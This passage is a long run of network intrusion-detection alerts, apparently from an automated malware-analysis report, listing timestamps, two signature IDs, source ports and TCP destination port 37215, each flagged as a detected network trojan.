              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188168
              SID:2835222
              Source Port:58310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429804
              SID:2829579
              Source Port:40830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457002
              SID:2835222
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536889
              SID:2829579
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635604
              SID:2829579
              Source Port:59516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868617
              SID:2829579
              Source Port:33868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365361
              SID:2835222
              Source Port:43380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103702
              SID:2829579
              Source Port:51632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406434
              SID:2835222
              Source Port:58014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122129
              SID:2829579
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661875
              SID:2835222
              Source Port:37494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530698
              SID:2829579
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150721
              SID:2835222
              Source Port:59070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923863
              SID:2835222
              Source Port:53890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347633
              SID:2829579
              Source Port:36344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448001
              SID:2835222
              Source Port:42502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973678
              SID:2829579
              Source Port:49576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641727
              SID:2835222
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121488
              SID:2835222
              Source Port:57962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540716
              SID:2835222
              Source Port:39332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625253
              SID:2835222
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458171
              SID:2835222
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433428
              SID:2829579
              Source Port:35742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205918
              SID:2829579
              Source Port:48670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864816
              SID:2835222
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059928
              SID:2829579
              Source Port:43496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534896
              SID:2835222
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450166
              SID:2829579
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070919
              SID:2835222
              Source Port:54018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639904
              SID:2829579
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401564
              SID:2829579
              Source Port:41008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585143
              SID:2829579
              Source Port:55468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978319
              SID:2829579
              Source Port:36752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114487
              SID:2835222
              Source Port:34344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553500
              SID:2829579
              Source Port:43474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113479
              SID:2835222
              Source Port:51106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303244
              SID:2835222
              Source Port:45534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151035
              SID:2835222
              Source Port:44262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.762019
              SID:2829579
              Source Port:34346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189027
              SID:2835222
              Source Port:41080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456297
              SID:2835222
              Source Port:35338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395096
              SID:2829579
              Source Port:60804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926901
              SID:2835222
              Source Port:59524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235324
              SID:2835222
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099647
              SID:2829579
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071030
              SID:2835222
              Source Port:44748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542391
              SID:2829579
              Source Port:59258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455436
              SID:2829579
              Source Port:35352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492362
              SID:2835222
              Source Port:57516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197273
              SID:2835222
              Source Port:40796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313250
              SID:2829579
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118187
              SID:2835222
              Source Port:37284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055405
              SID:2835222
              Source Port:58302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411837
              SID:2829579
              Source Port:47078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313522
              SID:2829579
              Source Port:53244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868668
              SID:2835222
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060695
              SID:2829579
              Source Port:55712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187926
              SID:2835222
              Source Port:38994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568191
              SID:2829579
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573890
              SID:2835222
              Source Port:42878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102245
              SID:2829579
              Source Port:49350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835232
              SID:2829579
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189038
              SID:2829579
              Source Port:53432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923996
              SID:2829579
              Source Port:53786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660890
              SID:2829579
              Source Port:43720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724426
              SID:2835222
              Source Port:46180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625306
              SID:2829579
              Source Port:34006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581795
              SID:2835222
              Source Port:47840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067546
              SID:2835222
              Source Port:37226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522216
              SID:2829579
              Source Port:34292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622975
              SID:2829579
              Source Port:35334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663736
              SID:2835222
              Source Port:42092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045081
              SID:2835222
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404399
              SID:2835222
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596501
              SID:2835222
              Source Port:33790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116061
              SID:2835222
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303269
              SID:2835222
              Source Port:52254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098195
              SID:2829579
              Source Port:52808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453810
              SID:2829579
              Source Port:37918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300343
              SID:2835222
              Source Port:51002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374837
              SID:2829579
              Source Port:51120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050089
              SID:2835222
              Source Port:48026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568314
              SID:2829579
              Source Port:34344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334171
              SID:2829579
              Source Port:57620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882541
              SID:2829579
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484335
              SID:2829579
              Source Port:49148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254197
              SID:2829579
              Source Port:57760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858972
              SID:2835222
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360965
              SID:2835222
              Source Port:55706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063947
              SID:2835222
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502735
              SID:2829579
              Source Port:59622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066191
              SID:2835222
              Source Port:54362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250659
              SID:2829579
              Source Port:39388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924239
              SID:2835222
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726585
              SID:2829579
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188077
              SID:2835222
              Source Port:34044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492537
              SID:2835222
              Source Port:39358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884590
              SID:2835222
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383301
              SID:2829579
              Source Port:57800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061765
              SID:2829579
              Source Port:45042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231841
              SID:2829579
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575281
              SID:2835222
              Source Port:49894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920545
              SID:2829579
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447950
              SID:2829579
              Source Port:54270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409092
              SID:2829579
              Source Port:45902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060947
              SID:2829579
              Source Port:32860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575271
              SID:2835222
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490503
              SID:2835222
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630602
              SID:2829579
              Source Port:60262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836282
              SID:2835222
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148591
              SID:2835222
              Source Port:53188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404613
              SID:2835222
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857740
              SID:2835222
              Source Port:48100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300101
              SID:2829579
              Source Port:53066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404379
              SID:2829579
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347704
              SID:2829579
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856924
              SID:2835222
              Source Port:51714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623335
              SID:2835222
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451260
              SID:2835222
              Source Port:48112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535096
              SID:2835222
              Source Port:42736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057398
              SID:2835222
              Source Port:49296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165181
              SID:2829579
              Source Port:50014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334146
              SID:2829579
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631773
              SID:2829579
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049762
              SID:2829579
              Source Port:48156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124224
              SID:2829579
              Source Port:46114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549877
              SID:2829579
              Source Port:52748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308471
              SID:2835222
              Source Port:39708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545151
              SID:2835222
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634682
              SID:2829579
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109390
              SID:2835222
              Source Port:44518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872015
              SID:2835222
              Source Port:39854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040598
              SID:2835222
              Source Port:54288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994196
              SID:2829579
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364381
              SID:2829579
              Source Port:56502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531873
              SID:2829579
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209541
              SID:2835222
              Source Port:33552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546349
              SID:2829579
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608773
              SID:2829579
              Source Port:47830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187565
              SID:2835222
              Source Port:37988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253704
              SID:2835222
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480760
              SID:2829579
              Source Port:49658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802624
              SID:2835222
              Source Port:58012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663376
              SID:2835222
              Source Port:50882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280949
              SID:2835222
              Source Port:42294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372573
              SID:2835222
              Source Port:34018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575372
              SID:2835222
              Source Port:41238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096762
              SID:2829579
              Source Port:54192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234463
              SID:2835222
              Source Port:33404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554185
              SID:2829579
              Source Port:41512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070687
              SID:2835222
              Source Port:38690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408080
              SID:2829579
              Source Port:47442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396561
              SID:2829579
              Source Port:60022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574701
              SID:2829579
              Source Port:45442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368998
              SID:2835222
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516616
              SID:2829579
              Source Port:54692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520150
              SID:2829579
              Source Port:52606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485771
              SID:2835222
              Source Port:34912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.767083
              SID:2829579
              Source Port:57012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624451
              SID:2829579
              Source Port:34670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526813
              SID:2829579
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857828
              SID:2829579
              Source Port:34044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114494
              SID:2829579
              Source Port:45434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2829579
              Source Port:39812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552323
              SID:2835222
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536788
              SID:2835222
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606138
              SID:2829579
              Source Port:60596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341115
              SID:2829579
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821853
              SID:2829579
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065803
              SID:2829579
              Source Port:34638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449042
              SID:2829579
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199787
              SID:2829579
              Source Port:45216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858987
              SID:2829579
              Source Port:36292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802925
              SID:2835222
              Source Port:33182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928874
              SID:2829579
              Source Port:40452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128595
              SID:2835222
              Source Port:50390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2835222
              Source Port:38178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394106
              SID:2829579
              Source Port:50060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491554
              SID:2835222
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988496
              SID:2835222
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749746
              SID:2835222
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768195
              SID:2835222
              Source Port:33788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882528
              SID:2835222
              Source Port:37538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456832
              SID:2835222
              Source Port:32924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586950
              SID:2829579
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421693
              SID:2829579
              Source Port:60280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799386
              SID:2829579
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374691
              SID:2829579
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378132
              SID:2835222
              Source Port:40540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857113
              SID:2829579
              Source Port:57986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375053
              SID:2829579
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372513
              SID:2829579
              Source Port:42460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532321
              SID:2829579
              Source Port:57656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334285
              SID:2829579
              Source Port:58350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055299
              SID:2829579
              Source Port:54054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624851
              SID:2829579
              Source Port:54522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165633
              SID:2829579
              Source Port:36320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
